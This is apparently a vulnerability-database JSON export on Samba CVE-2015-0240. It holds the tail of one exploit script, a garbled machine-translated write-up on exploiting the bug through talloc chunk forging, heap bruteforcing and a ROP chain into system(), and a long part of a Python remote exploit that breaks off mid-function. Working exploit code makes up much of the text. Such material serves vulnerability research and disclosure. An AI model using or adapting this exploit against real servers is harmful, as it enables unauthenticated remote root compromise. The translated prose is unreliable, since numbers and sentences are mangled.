(accountName) address in heap. If this is defined, no heap bruteforcing')\r\nparser.add_argument('-sps', '--start_payload_size', type=int,\r\n help='start payload size for bruteforcing heap address in KB. (128, 256, 512, ...)')\r\n \r\nargs = parser.parse_args()\r\nrequester.set_target(args.target)\r\n \r\n \r\ntry:\r\n do_work(args)\r\nexcept KeyboardInterrupt:\r\n pass\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23513"}], "myhack58": [{"lastseen": "2016-10-28T18:45:46", "bulletinFamily": "info", "description": "## 1 demo\n\n## [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h2_ \u80cc\u666f>)2 background\n\n2 0 1 5 year 2 Month 2 3 day, the Red Hat product security team released a Samba service end of the smbd vulnerability announcement [1], the vulnerability number is[CVE-2 0 1 5-0 2 4 0](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0240>), almost affect all versions. The vulnerability trigger is not needed by the Samba server account authentication, and the smbd service end is usually to run with root privileges, if the vulnerability can be used to achieve arbitrary code execution, an attacker can remotely obtain system root privileges, the harm is extremely serious, and therefore the vulnerability of CVSS score also reached the 1 to 0.\n\nThe vulnerability of the basic principle is to stack on the uninitialized pointer is passed in TALLOC_FREE()function. Want to take advantage of this vulnerability, you first need to control on the stack uninitialized data, this and the compilation the generated binary file stack layout related. 
So few foreign security researchers for different Linux distributions the binary file to do the analysis, wherein the Worawit Wang([@sleepya_](<https://twitter.com/sleepya/_>))gives better results, he confirmed on Ubuntu 12.04 x86 (Samba 3.6.3)and Debian 7 x86 (Samba 3.6.6), this vulnerability can be used to achieve remote code arbitrary execution, reference [2] in the comments. After England established the security company NCC Group of researchers shows exploit the idea of [4], but also not to use details and exploit code. Herein a detailed analysis and to achieve a Ubuntu 12.04 x86\uff08Debian 7 x86 case is similar to the platform under the Samba service end of the remote code that any execution of exploit it.\n\n## [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h3_ \u6f0f\u6d1e \u7b80\u4ecb>)3 vulnerability profile\n\nThere have been many articles shows vulnerability analysis [3], here only do a brief introduction. The vulnerability occurs in a function _netr_ServerPasswordSet (), local variable creds was originally desired by netr_creds_server_step_check() function to initialize, but if the structure of the input such that the netr_creds_server_step_check() fails, it can lead to creds is not initialized were introduced in the TALLOC_FREE()function:\n\n\nNTSTATUS _netr_ServerPasswordSet(struct pipes_struct *p, struct netr_ServerPasswordSet *r)\n{\nNTSTATUS status = NT_STATUS_OK; int i; struct netlogon_creds_CredentialState *creds;\n[...]\nstatus = netr_creds_server_step_check(p, p->mem_ctx, r->in. computer_name, r->in. credential, r->out. return_authenticator, &creds);\nunbecome_root(); if (! 
NT_STATUS_IS_OK(status)) {\n[...]\nTALLOC_FREE(creds); return status;\n}\n\n## [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h4_ \u6f0f\u6d1e \u5229\u7528>)4 exploit\n\nWe first look at the smbd binary which turned on what protection mechanisms:\n\n\n$ checksec.sh --file smbd\nRELRO STACK CANARY NX PIE RPATH RUNPATH FILE\nFull RELRO Canary found NX enabled PIE enabled No RPATH No RUNPATH smbd\n\nCompiler all be able to add protection mechanisms are used, the most attention is required on the PIE of protection, so if you want to use the binary itself code fragment to ROP or call the import function, you must first know the program itself to load the address.\n\n### [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h4.1_ \u4efb\u610f \u5730\u5740 free>)4.1 any address Free\n\nTo exploit this vulnerability, you first need to find a control flow, to be able to control on the stack not initialized the pointer creds, so that we can achieve arbitrary address to call TALLOC_FREE () on. According to@sleepya_ the PoC, we already know, in Ubuntu 12.04 and Debian 7 x86 system, NetrServerPasswordSet request among PrimaryName the ReferentID domain happens to fall in a stack on the uninitialized pointer creds position. So we can by constructing ReferentID to achieve any address Free. PoC code is as follows:\n\n\nprimaryName = nrpc. PLOGONSRV_HANDLE() # ReferentID field of PrimaryName controls the uninitialized value of creds in ubuntu 12.04 32bit primaryName. fields['ReferentID'] = 0x41414141 \n\n### [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h4.2_ \u63a7\u5236 eip>)4.2 control EIP\n\nWith any address Free, we can think of a way to let the TALLOC_FREE()to release our control of the memory block, but we do not know we can control the memory address of the DCERPC request of the data stored in the heap. 
We can brute-force the stack address, because the smbd process using the fork the way to handle each connection, the memory space of the layout is unchanged. In addition, we may be in a heap on a large number of arrangement of the TALLOC memory blocks, to improve the hit rate, as far as possible to reduce the enumeration space. We first assume that already know the heap address, first take a look at how to structure TALLOC memory block to hijack the EIP. We need to get to know TALLOC_FREE (). First take a look at the TALLOC memory blocks of the structure:\n\n\nstruct talloc_chunk { struct talloc_chunk *next, *prev; struct talloc_chunk *parent, *child; struct talloc_reference_handle *refs;\ntalloc_destructor_t destructor; const char *name;\nsize_t size; unsigned flags; void *pool; 8 bytes padding;\n};\n\nIn order to meet the 1 6-byte aligned, this structure at the end there are 8 bytes of padding, so that the talloc_chunk structure a total of 4 to 8 bytes. In this structure, the destructor is a function pointer, we can be of any configuration. 
First take a look at the TALLOC_FREE()this macro expands to the code:\n\n\n_PUBLIC_ int _talloc_free(void *ptr, const char *location)\n{ struct talloc_chunk *tc; if (unlikely(ptr == NULL)) { return -1;\n}\ntc = talloc_chunk_from_ptr(ptr);\n...\n}\n\n_talloc_free()and call the talloc_chunk_from_ptr (), this function is used to convert the memory pointer when the allocation is returned to the user using the pointer ptr into into the talloc_chunk pointer.\n\n\n/* panic if we get a bad magic value */ static inline struct talloc_chunk *talloc_chunk_from_ptr(const void *ptr)\n{ const char *pp = (const char *)ptr; struct talloc_chunk *tc = discard_const_p(struct talloc_chunk, pp - TC_HDR_SIZE); if (unlikely((tc->flags & (TALLOC_FLAG_FREE | ~0xF)) != TALLOC_MAGIC)) { if ((tc->flags & (~0xFFF)) == TALLOC_MAGIC_BASE) {\ntalloc_abort_magic(tc->flags & (~0xF)); return NULL;\n} if (tc->flags & TALLOC_FLAG_FREE) {\ntalloc_log(\"talloc: access after free error- first free may be at %s\\n\", tc->name);\ntalloc_abort_access_after_free(); return NULL;\n} else {\ntalloc_abort_unknown_value(); return NULL;\n}\n} return tc;\n}\n\nThis function simply takes the user memory pointer is subtracted TC_HDR_SIZE and return, TC_HDR_SIZE is talloc_chunk size 4 8, but we need to meet the tc->flags check, which is set to the correct Magic Number, otherwise the function cannot return the correct pointer. 
Next, we continue to see _talloc_free()function:\n\n\n_PUBLIC_ int _talloc_free(void *ptr, const char *location)\n{\n...\ntc = talloc_chunk_from_ptr(ptr); if (unlikely(tc->refs != NULL)) { struct talloc_reference_handle *h; if (talloc_parent(ptr) == null_context && tc->refs->next == NULL) { return talloc_unlink(null_context, ptr);\n}\ntalloc_log(\"ERROR: talloc_free with references at %s\\n\",\nlocation); for (h=tc->refs; h; h=h->next) {\ntalloc_log(\"\\treference at %s\\n\",\nh->location);\n} return -1;\n} return _talloc_free_internal(ptr, location);\n}\n\nIf tc->refs not equal to NULL, then enter the if branch: in order to get inside the first if branch is not linked, we need to put the tc->parent pointer is set to NULL; immediately after the for Loop and requires that we let tc->refs point to a legitimate list, there are some complex. We'll see if tc->refs for the NULL case, i.e. the program proceeds to a _talloc_free_internal()function:\n\n\nstatic inline int _talloc_free_internal(void *ptr, const char *location)\n{\n... if (unlikely(tc->flags & TALLOC_FLAG_LOOP)) { /* we have a free loop - stop looping */ return 0;\n} if (unlikely(tc->destructor)) {\ntalloc_destructor_t d = tc->destructor; if (d == (talloc_destructor_t)-1) { return -1;\n}\ntc->destructor = (talloc_destructor_t)-1; if (d(ptr) == -1) { // call destructor tc->destructor = d; return -1;\n}\ntc->destructor = NULL;\n}\n...\n}\n\nWe omitted the function has no need to consider part in the above function, we have seen talloc_chunk the destructor to be called up, but before that there are some checks: first if, we can not be in the flags set in the TALLOC_FLAG_LOOP; in the second if, the destructor if set to -1, the function returns -1, the program will not crash if the destructor is set to another illegal address, then the program will crash and exit. 
We can use this feature to verify the exhaustive heap address is accurate: we are in the exhaustive when the destructor is set to-1, When you find one to TALLOC_FREE()the address does not let the program crash requests have returned, then the destructor is set to an illegal address, if the program at this time to crash, then we find that the address is correct. Now we summarize what we need to construct the chunk should satisfy the conditions:\n\n\nstruct talloc_chunk { struct talloc_chunk *next, *prev; // no request struct talloc_chunk *parent, *child; // no request struct talloc_reference_handle *refs; // refs = 0 talloc_destructor_t destructor; // destructor = -1: (No Crash), others: is controled EIP const char *name;\nsize_t size; unsigned flags; // Condition 1: flags & (TALLOC_FLAG_FREE | ~0xF)) == TALLOC_MAGIC // condition 2: tc->flags & TALLOC_FLAG_LOOP == False void *pool; // not required 8 bytes padding; // not required };\n\nSo far, we already know how through the structure of the chunk passed to the TALLOC_FREE()to control the EIP.\n\n### [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h4.3_ \u7a77 \u4e3e \u5806 \u5730\u5740>)4.3 exhaustive heap address\n\nAfter modifying the PoC and combined with the gdb debugging found that, we can use the new password to construct a large number of the chunk corresponding to the PoC in the uasNewPass['Data'] is. Although sent to the Samba of the request which have a lot of data stored in the heap, among such as username and password, refer to [2], but much of the data required to comply with WSTR encoding, can not be passed to any character. In order to improve the exhaustive heap address of the efficiency, we use [4] proposed the idea of using only contains the refs, a destructor, name, size, flags this the 5 domain of the compressed chunk, from 4 to 8 bytes reduced to 2 0 Byte, so in our exhaustive only when the need for each address of the exhaustive 5 offset instead of the original 1 2. 
Compressing the chunk of the injection and the actual talloc_chunk structure of the corresponding relationship as shown below.\n\n! [image](/Article/UploadPic/2015-4/2 0 1 5 4 1 4 1 2 2 8 7 3 7 4. png)\n\nchunk injection quantity will also affect to the exhaustive efficiency. If the in-memory injection of the chunk more, you'll need to enumerate the space will be reduced, but each enumeration the network transport, the program of the input processing and the like factors of the resulting time overhead also increases, so the need according to the actual situation to select a compromise value. In addition, in our implementation of the exploit, the use of a process pool to achieve parallel enumeration, improved exhaustive efficiency.\n\n### [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h4.4_rop>)4.4 ROP\n\nTo achieve the ROP, we also need to enumerate the Samba program loads the base address. Due to the address randomization protection mechanisms of the minimum granularity of memory page, so we press the pages to enumerate can 0x1000 bytes. We in the platform, a large number of test address space may range, roughly 0x200 kinds of possible scenarios can be accepted. Now we can only be configured through the destructor to control once the EIP, in order to achieve the ROP, you first need to do stack migration stack pivot we in the samba binary is found in the following gadget: a\n\n\n0x000a6d7c: lea esp, dword [ecx-0x04] ; ret ; \n\nSince the control of the EIP site, the ecx-0x4 just point to the chunk name field, so we can see from the name field to start ROP. 
By setting the name field to a pop4ret gadget (pop eax ; pop esi ; pop edi ; pop ebp ; ret), esp can be made to point to the name field of the next compressed chunk, and so on down the chain, until esp reaches the end of the injected memory, where a ROP payload of unlimited length can be written.\n\n[4] did not give the specific stack-migration gadget, but judging from the figure shown in that text, it can be speculated that the NCC Group researchers used the same gadget.\n\n### [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h4.5_ \u4efb\u610f \u4ee3\u7801 \u6267\u884c>)4.5 arbitrary code execution\n\nNote that the smbd program imports the system function, so the PLT address of system can be called directly to execute arbitrary commands. But how is the command written? If the command were placed on the stack, we currently only know the address of the compressed chunk, of which only 4 bytes are usable, so we instead call snprintf to write the command byte by byte into the .bss section; this way a command of arbitrary length can be executed. Note that, because the binary is compiled as position-independent code (PIC), the GOT address must be restored into the ebx register before calling snprintf and system. 
The Python code to generate the ROP payload is as follows:\n\n\n# ebx => got rop = l32(popebx) + l32(got) # write cmd to bss, fmt == \"%c\" for i in xrange(len(cmd)):\nc = cmd[i]\nrop += l32(snprintf) + l32(pop4ret)\nrop += l32(bss + i) + l32(2) + l32(fmt) + l32(ord(c)) # system(cmd) rop += l32(system) + 'leet' + l32(bss)\n\n[4] uses the conventional approach of mmap() + memcpy() followed by executing shellcode, which achieves the same effect.\n\n### [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h4.6_exploit \u5b8c\u6574 \u4ee3\u7801>)4.6 full exploit code\n\n[samba-exploit.py](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/samba-exploit.py>)\n\n## [](<http://blog.chaitin.com/samba_exploit_cve-2015-0240/#h5_ \u53c2\u8003\u8d44\u6599>)5 references\n\n1. [Samba vulnerability (CVE-2015-0240)](<https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/?spm=0.0.0.0.e8Vbd3>)\n2. [PoC for Samba vulnerabilty (CVE-2015-0240)](<https://gist.github.com/worawit/33cc5534cb555a0b710b>)\n3. [Samba _netr_ServerPasswordSet Expoitability Analysis](<https://www.nccgroup.trust/en/blog/2015/03/samba-_netr_serverpasswordset-expoitability-analysis/>)\n4. [Exploiting Samba CVE-2015-0240 on Ubuntu 12.04 and Debian 7 32-bit](<https://www.nccgroup.trust/en/blog/2015/03/exploiting-samba-cve-2015-0240-on-ubuntu-1204-and-debian-7-32-bit/>)\n\n", "modified": "2015-04-14T00:00:00", "published": "2015-04-14T00:00:00", "id": "MYHACK58:62201561147", "href": "http://www.myhack58.com/Article/html/3/62/2015/61147.htm", "type": "myhack58", "title": "Samba CVE-2015-0240 remote code execution exploit practice-vulnerability warning-the black bar safety net", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-04T04:14:01", "bulletinFamily": "exploit", "description": "Samba < 3.6.2 x86 - PoC. CVE-2015-0240. 
Dos exploit for linux platform", "modified": "2015-04-13T00:00:00", "published": "2015-04-13T00:00:00", "id": "EDB-ID:36741", "href": "https://www.exploit-db.com/exploits/36741/", "type": "exploitdb", "title": "Samba < 3.6.2 x86 - PoC", "sourceData": "#!/usr/bin/python\r\n\"\"\"\r\nExploit for Samba vulnerabilty (CVE-2015-0240) by sleepya\r\n\r\nThe exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by \r\nReferentID field of PrimaryName (ServerName). That means '_talloc_zero()'\r\nin libtalloc does not write a value on 'creds' address.\r\n\r\nReference:\r\n- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/\r\n\r\nNote:\r\n- heap might be changed while running exploit, need to try again (with '-hs' or '-pa' option)\r\n if something failed\r\n\r\nFind heap address:\r\n- ubuntu PIE heap start range: b7700000 - b9800000\r\n- start payload size: the bigger it is the lesser connection and binding time.\r\n but need more time to shrink payload size\r\n- payload is too big to fit in freed small hole. so payload is always at end\r\n of heap\r\n- start bruteforcing heap address from high memory address to low memory address\r\n to prevent 'creds' pointed to real heap chunk (also no crash but not our payload)\r\n\r\nLeak info:\r\n- heap layout is predictable because talloc_stackframe_pool(8192) is called after \r\n accepted connection and fork but before calling smbd_server_connection_loop_once()\r\n- before talloc_stackframe_pool(8192) is called, there are many holes in heap\r\n but their size are <8K. so pool is at the end of heap at this time\r\n- many data that allocated after talloc_stackframe_pool(8192) are allocated in pool.\r\n with the same pattern of request, the layout in pool are always the same.\r\n- many data are not allocated in pool but fit in free holes. 
so no small size data are\r\n allocated after pool.\r\n- normally there are only few data block allocated after pool.\r\n - pool size: 0x2048 (included glibc heap header 4 bytes)\r\n - a table that created in giconv_open(). the size is 0x7f88 (included glibc heap header 4 bytes)\r\n - p->in_data.pdu.data. the size is 0x10e8 (included glibc heap header 4 bytes)\r\n - this might not be allocated here because its size might fit in freed hole\r\n - all fragment should be same size to prevent talloc_realloc() changed pdu.data size\r\n - so last fragment should be padded\r\n - ndr DATA_BLOB. the size is 0x10d0 (included glibc heap header 4 bytes)\r\n - this might not be allocated here because its size might fit in freed hole\r\n - p->in_data.data.data. the size is our netlogon data\r\n - for 8K payload, the size is 0x2168 (included glibc heap header 4 bytes)\r\n - this data is allocated by realloc(), grew by each fragment. so this memory\r\n block is not allocated by mmapped even the size is very big.\r\n- pool layout for interested data\r\n - r->out offset from pool (talloc header) is 0x13c0\r\n - r->out.return_authenticator offset from pool is 0x13c0+0x18\r\n - overwrite this (with link unlink) to leak info in ServerPasswordSet response\r\n - smb_request offset from pool (talloc header) is 0x11a0\r\n - smb_request.sconn offset from pool is 0x11a0+0x3c\r\n - socket fd is at smb_request.sconn address (first struct member)\r\n- more shared folder in configuration, more freed heap holes\r\n - only if there is no or one shared, many data might be unexpected allocated after pool.\r\n have to get that extra offset or bruteforce it\r\n\r\n\r\nMore exploitation detail in code (comment) ;)\r\n\"\"\"\r\n\r\nimport sys\r\nimport time\r\nfrom struct import pack,unpack\r\nimport argparse\r\n\r\nimport impacket\r\nfrom impacket.dcerpc.v5 import transport, nrpc\r\nfrom impacket.dcerpc.v5.ndr import NDRCALL\r\nfrom impacket.dcerpc.v5.dtypes import WSTR\r\n\r\n\r\nclass Requester:\r\n 
\"\"\"\r\n put all smb request stuff into class. help my editor folding them\r\n \"\"\"\r\n \r\n # impacket does not implement NetrServerPasswordSet\r\n # 3.5.4.4.6 NetrServerPasswordSet (Opnum 6)\r\n class NetrServerPasswordSet(NDRCALL):\r\n opnum = 6\r\n structure = (\r\n ('PrimaryName',nrpc.PLOGONSRV_HANDLE),\r\n ('AccountName',WSTR),\r\n ('SecureChannelType',nrpc.NETLOGON_SECURE_CHANNEL_TYPE),\r\n ('ComputerName',WSTR),\r\n ('Authenticator',nrpc.NETLOGON_AUTHENTICATOR),\r\n ('UasNewPassword',nrpc.ENCRYPTED_NT_OWF_PASSWORD),\r\n )\r\n # response is authenticator (8 bytes) and error code (4 bytes)\r\n\r\n # size of each field in sent packet\r\n req_server_handle_size = 16\r\n req_username_hdr_size = 4 + 4 + 4 + 2 # max count, offset, actual count, trailing null\r\n req_sec_type_size = 2\r\n req_computer_size = 4 + 4 + 4 + 2\r\n req_authenticator_size = 8 + 2 + 4\r\n req_new_pwd_size = 16\r\n req_presize = req_server_handle_size + req_username_hdr_size + req_sec_type_size + req_computer_size + req_authenticator_size + req_new_pwd_size\r\n \r\n samba_rpc_fragment_size = 4280\r\n netlogon_data_fragment_size = samba_rpc_fragment_size - 8 - 24 # 24 is dcerpc header size\r\n \r\n def __init__(self):\r\n self.target = None\r\n self.dce = None\r\n \r\n sessionKey = '\\x00'*16\r\n # prepare ServerPasswordSet request\r\n authenticator = nrpc.NETLOGON_AUTHENTICATOR()\r\n authenticator['Credential'] = nrpc.ComputeNetlogonCredential('12345678', sessionKey)\r\n authenticator['Timestamp'] = 10\r\n\r\n uasNewPass = nrpc.ENCRYPTED_NT_OWF_PASSWORD()\r\n uasNewPass['Data'] = '\\x00'*16\r\n\r\n self.serverName = nrpc.PLOGONSRV_HANDLE()\r\n # ReferentID field of PrimaryName controls the uninitialized value of creds\r\n self.serverName.fields['ReferentID'] = 0\r\n \r\n self.accountName = WSTR()\r\n\r\n request = Requester.NetrServerPasswordSet()\r\n request['PrimaryName'] = self.serverName\r\n request['AccountName'] = self.accountName\r\n request['SecureChannelType'] = 
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel\r\n request['ComputerName'] = '\\x00'\r\n request['Authenticator'] = authenticator\r\n request['UasNewPassword'] = uasNewPass\r\n self.request = request\r\n \r\n def set_target(self, target):\r\n self.target = target\r\n \r\n def set_payload(self, s, pad_to_size=0):\r\n if pad_to_size > 0:\r\n s += '\\x00'*(pad_to_size-len(s))\r\n pad_size = 0\r\n if len(s) < (16*1024+1):\r\n ofsize = (len(s)+self.req_presize) % self.netlogon_data_fragment_size\r\n if ofsize > 0:\r\n pad_size = self.netlogon_data_fragment_size - ofsize\r\n \r\n self.accountName.fields['Data'] = s+'\\x00'*pad_size+'\\x00\\x00'\r\n self.accountName.fields['MaximumCount'] = None\r\n self.accountName.fields['ActualCount'] = None\r\n self.accountName.data = None # force recompute\r\n \r\n set_accountNameData = set_payload\r\n\r\n def get_dce(self):\r\n if self.dce is None or self.dce.lostconn:\r\n rpctransport = transport.DCERPCTransportFactory(r'ncacn_np:%s[\\PIPE\\netlogon]' % self.target)\r\n rpctransport.set_credentials('','') # NULL session\r\n rpctransport.set_dport(445)\r\n # force to 'NT LM 0.12' only\r\n rpctransport.preferred_dialect('NT LM 0.12')\r\n \r\n self.dce = rpctransport.get_dce_rpc()\r\n self.dce.connect()\r\n self.dce.bind(nrpc.MSRPC_UUID_NRPC)\r\n self.dce.lostconn = False\r\n return self.dce\r\n\r\n def get_socket(self):\r\n return self.dce.get_rpc_transport().get_socket()\r\n \r\n def force_dce_disconnect(self):\r\n if not (self.dce is None or self.dce.lostconn):\r\n self.get_socket().close()\r\n self.dce.lostconn = True\r\n\r\n def request_addr(self, addr):\r\n self.serverName.fields['ReferentID'] = addr\r\n \r\n dce = self.get_dce()\r\n try:\r\n dce.call(self.request.opnum, self.request)\r\n answer = dce.recv()\r\n return unpack(\"<IIII\", answer)\r\n except impacket.nmb.NetBIOSError as e:\r\n if e.args[0] != 'Error while reading from remote':\r\n raise\r\n dce.lostconn = True\r\n return None\r\n\r\n # call with no 
read\r\n def call_addr(self, addr):\r\n self.serverName.fields['ReferentID'] = addr\r\n \r\n dce = self.get_dce()\r\n try:\r\n dce.call(self.request.opnum, self.request)\r\n return True\r\n except impacket.nmb.NetBIOSError as e:\r\n if e.args[0] != 'Error while reading from remote':\r\n raise\r\n dce.lostconn = True\r\n return False\r\n \r\n def force_recv(self):\r\n dce = self.get_dce()\r\n return dce.get_rpc_transport().recv(forceRecv=True)\r\n\r\n def request_check_valid_addr(self, addr):\r\n answers = self.request_addr(addr)\r\n if answers is None:\r\n return False # connection lost\r\n elif answers[3] != 0:\r\n return True # error, expected\r\n else:\r\n raise Error('Unexpected result')\r\n\r\n\r\n# talloc constants\r\nTALLOC_MAGIC = 0xe8150c70 # for talloc 2.0\r\nTALLOC_FLAG_FREE = 0x01\r\nTALLOC_FLAG_LOOP = 0x02\r\nTALLOC_FLAG_POOL = 0x04\r\nTALLOC_FLAG_POOLMEM = 0x08\r\n\r\nTALLOC_HDR_SIZE = 0x30 # for 32 bit\r\n\r\nflag_loop = TALLOC_MAGIC | TALLOC_FLAG_LOOP # for checking valid address\r\n\r\n# Note: do NOT reduce target_payload_size less than 8KB. 4KB is too small buffer. 
cannot predict address.\r\nTARGET_PAYLOAD_SIZE = 8192\r\n\r\n########\r\n# request helper functions\r\n########\r\n\r\n# only one global requester\r\nrequester = Requester()\r\n\r\ndef force_dce_disconnect():\r\n requester.force_dce_disconnect()\r\n\r\ndef request_addr(addr):\r\n return requester.request_addr(addr)\r\n\r\ndef request_check_valid_addr(addr):\r\n return requester.request_check_valid_addr(addr)\r\n\r\ndef set_payload(s, pad_to_size=0):\r\n requester.set_payload(s, pad_to_size)\r\n\r\ndef get_socket():\r\n return requester.get_socket()\r\n \r\ndef call_addr(addr):\r\n return requester.call_addr(addr)\r\n\r\ndef force_recv():\r\n return requester.force_recv()\r\n \r\n########\r\n# find heap address\r\n########\r\n\r\n# only refs MUST be NULL, other never be checked\r\nfake_chunk_find_heap = pack(\"<IIIIIIII\",\r\n 0, 0, 0, 0, # refs\r\n flag_loop, flag_loop, flag_loop, flag_loop,\r\n)\r\n\r\ndef find_valid_heap_addr(start_addr, stop_addr, payload_size, first=False):\r\n \"\"\"\r\n below code can be used for checking valid heap address (no crash)\r\n\r\n if (unlikely(tc->flags & TALLOC_FLAG_LOOP)) {\r\n /* we have a free loop - stop looping */\r\n return 0;\r\n }\r\n \"\"\"\r\n global fake_chunk_find_heap\r\n payload = fake_chunk_find_heap*(payload_size/len(fake_chunk_find_heap))\r\n set_payload(payload)\r\n addr_step = payload_size\r\n addr = start_addr\r\n i = 0\r\n while addr > stop_addr:\r\n if i == 16:\r\n print(\" [*]trying addr: {:x}\".format(addr))\r\n i = 0\r\n \r\n if request_check_valid_addr(addr):\r\n return addr\r\n if first:\r\n # first time, the last 16 bit is still do not know\r\n # have to do extra check\r\n if request_check_valid_addr(addr+0x10):\r\n return addr+0x10\r\n addr -= addr_step\r\n i += 1\r\n return None\r\n\r\ndef find_valid_heap_exact_addr(addr, payload_size):\r\n global fake_chunk_find_heap\r\n fake_size = payload_size // 2\r\n while fake_size >= len(fake_chunk_find_heap):\r\n payload = 
fake_chunk_find_heap*(fake_size/len(fake_chunk_find_heap))\r\n set_payload(payload, payload_size)\r\n if not request_check_valid_addr(addr):\r\n addr -= fake_size\r\n fake_size = fake_size // 2\r\n \r\n set_payload('\\x00'*16 + pack(\"<I\", flag_loop), payload_size)\r\n # because glibc heap is align by 8\r\n # so the last 4 bit of address must be 0x4 or 0xc\r\n if request_check_valid_addr(addr-4):\r\n addr -= 4\r\n elif request_check_valid_addr(addr-0xc):\r\n addr -= 0xc\r\n else:\r\n print(\" [-] bad exact addr: {:x}\".format(addr))\r\n return 0\r\n \r\n print(\" [*] checking exact addr: {:x}\".format(addr))\r\n \r\n if (addr & 4) == 0:\r\n return 0\r\n \r\n # test the address\r\n \r\n # must be invalid (refs is AccountName.ActualCount)\r\n set_payload('\\x00'*12 + pack(\"<I\", flag_loop), payload_size)\r\n if request_check_valid_addr(addr-4):\r\n print(' [-] request_check_valid_addr(addr-4) failed')\r\n return 0\r\n # must be valid (refs is AccountName.Offset)\r\n # do check again if fail. sometimes heap layout is changed\r\n set_payload('\\x00'*8 + pack(\"<I\", flag_loop), payload_size)\r\n if not request_check_valid_addr(addr-8) and not request_check_valid_addr(addr-8) :\r\n print(' [-] request_check_valid_addr(addr-8) failed')\r\n return 0\r\n # must be invalid (refs is AccountName.MaxCount)\r\n set_payload('\\x00'*4 + pack(\"<I\", flag_loop), payload_size)\r\n if request_check_valid_addr(addr-0xc):\r\n print(' [-] request_check_valid_addr(addr-0xc) failed')\r\n return 0\r\n # must be valid (refs is ServerHandle.ActualCount)\r\n # do check again if fail. 
sometimes heap layout is changed\r\n set_payload(pack(\"<I\", flag_loop), payload_size)\r\n if not request_check_valid_addr(addr-0x10) and not request_check_valid_addr(addr-0x10):\r\n print(' [-] request_check_valid_addr(addr-0x10) failed')\r\n return 0\r\n \r\n return addr\r\n\r\ndef find_payload_addr(start_addr, start_payload_size, target_payload_size):\r\n print('[*] bruteforcing heap address...')\r\n\r\n start_addr = start_addr & 0xffff0000\r\n \r\n heap_addr = 0\r\n while heap_addr == 0:\r\n # loop from max to 0xb7700000 for finding heap area\r\n # offset 0x20000 is minimum offset from heap start to recieved data in heap\r\n stop_addr = 0xb7700000 + 0x20000\r\n good_addr = None\r\n payload_size = start_payload_size\r\n while payload_size >= target_payload_size:\r\n force_dce_disconnect()\r\n found_addr = None\r\n for i in range(3):\r\n found_addr = find_valid_heap_addr(start_addr, stop_addr, payload_size, good_addr is None)\r\n if found_addr is not None:\r\n break\r\n if found_addr is None:\r\n # failed\r\n good_addr = None\r\n break\r\n good_addr = found_addr\r\n print(\" [*] found valid addr ({:d}KB): {:x}\".format(payload_size//1024, good_addr))\r\n start_addr = good_addr\r\n stop_addr = good_addr - payload_size + 0x20\r\n payload_size //= 2\r\n\r\n if good_addr is not None:\r\n # try 3 times to find exact address. if address cannot be found, assume\r\n # minimizing payload size is not correct. 
start minimizing again\r\n for i in range(3):\r\n heap_addr = find_valid_heap_exact_addr(good_addr, target_payload_size)\r\n if heap_addr != 0:\r\n break\r\n force_dce_disconnect()\r\n \r\n if heap_addr == 0:\r\n print(' [-] failed to find payload adress')\r\n # start from last good address + some offset\r\n start_addr = (good_addr + 0x10000) & 0xffff0000\r\n print('[*] bruteforcing heap adress again from {:x}'.format(start_addr))\r\n \r\n payload_addr = heap_addr - len(fake_chunk_find_heap)\r\n print(\" [+] found payload addr: {:x}\".format(payload_addr))\r\n return payload_addr\r\n\r\n\r\n########\r\n# leak info\r\n########\r\n\r\ndef addr2utf_prefix(addr):\r\n def is_badchar(v):\r\n return (v >= 0xd8) and (v <= 0xdf)\r\n \r\n prefix = 0 # safe\r\n if is_badchar((addr)&0xff) or is_badchar((addr>>16)&0xff):\r\n prefix |= 2 # cannot have prefix\r\n if is_badchar((addr>>8)&0xff) or is_badchar((addr>>24)&0xff):\r\n prefix |= 1 # must have prefix\r\n return prefix\r\n \r\ndef leak_info_unlink(payload_addr, next_addr, prev_addr, retry=True, call_only=False):\r\n \"\"\"\r\n Note:\r\n - if next_addr and prev_addr are not zero, they must be writable address\r\n because of below code in _talloc_free_internal()\r\n if (tc->prev) tc->prev->next = tc->next;\r\n if (tc->next) tc->next->prev = tc->prev;\r\n \"\"\"\r\n # Note: U+D800 to U+DFFF is reserved (also bad char for samba)\r\n # check if '\\x00' is needed to avoid utf16 badchar\r\n prefix_len = addr2utf_prefix(next_addr) | addr2utf_prefix(prev_addr)\r\n if prefix_len == 3:\r\n return None # cannot avoid badchar\r\n if prefix_len == 2:\r\n prefix_len = 0\r\n\r\n fake_chunk_leak_info = pack(\"<IIIIIIIIIIII\",\r\n next_addr, prev_addr, # next, prev\r\n 0, 0, # parent, children\r\n 0, 0, # refs, destructor\r\n 0, 0, # name, size\r\n TALLOC_MAGIC | TALLOC_FLAG_POOL, # flag\r\n 0, 0, 0, # pool, pad, pad\r\n )\r\n payload = '\\x00'*prefix_len+fake_chunk_leak_info + pack(\"<I\", 0x80000) # pool_object_count\r\n 
